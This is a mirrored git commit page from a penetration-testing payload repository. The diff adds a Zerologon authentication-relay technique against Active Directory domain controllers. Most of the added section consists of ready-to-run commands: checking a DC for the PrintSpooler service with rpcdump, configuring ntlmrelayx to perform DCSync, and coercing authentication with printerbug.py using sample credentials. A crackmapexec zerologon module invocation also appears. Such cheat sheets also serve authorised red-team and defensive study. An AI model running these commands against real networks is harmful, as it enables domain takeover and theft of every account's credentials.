mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Added zerologon authentication relay technique
This commit is contained in:
parent
d4742a9688
commit
8caba394d5
@ -661,6 +661,26 @@ Exploit steps from the white paper
|
|||||||
```powershell
|
```powershell
|
||||||
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
|
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
|
||||||
```
|
```
|
||||||
|
|
||||||
|
A 2nd approach to exploit zerologon is done by relaying authentication.
|
||||||
|
|
||||||
|
This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity.
|
||||||
|
The following prerequisites are needed:
|
||||||
|
* A domain account
|
||||||
|
* One DC running the `PrintSpooler` service
|
||||||
|
* Another DC vulnerable to zerologon
|
||||||
|
|
||||||
|
* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
|
||||||
|
```powershell
|
||||||
|
# Check if one DC is running the PrintSpooler service
|
||||||
|
rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"
|
||||||
|
|
||||||
|
# Setup ntlmrelay in one shell
|
||||||
|
ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support
|
||||||
|
|
||||||
|
#Trigger printerbug in 2nd shell
|
||||||
|
python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12
|
||||||
|
```
|
||||||
|
|
||||||
#### PrintNightmare
|
#### PrintNightmare
|
||||||
|
|
||||||
@ -4148,4 +4168,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
||||||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
||||||
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
||||||
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
||||||
|
Loading…
Reference in New Issue
Block a user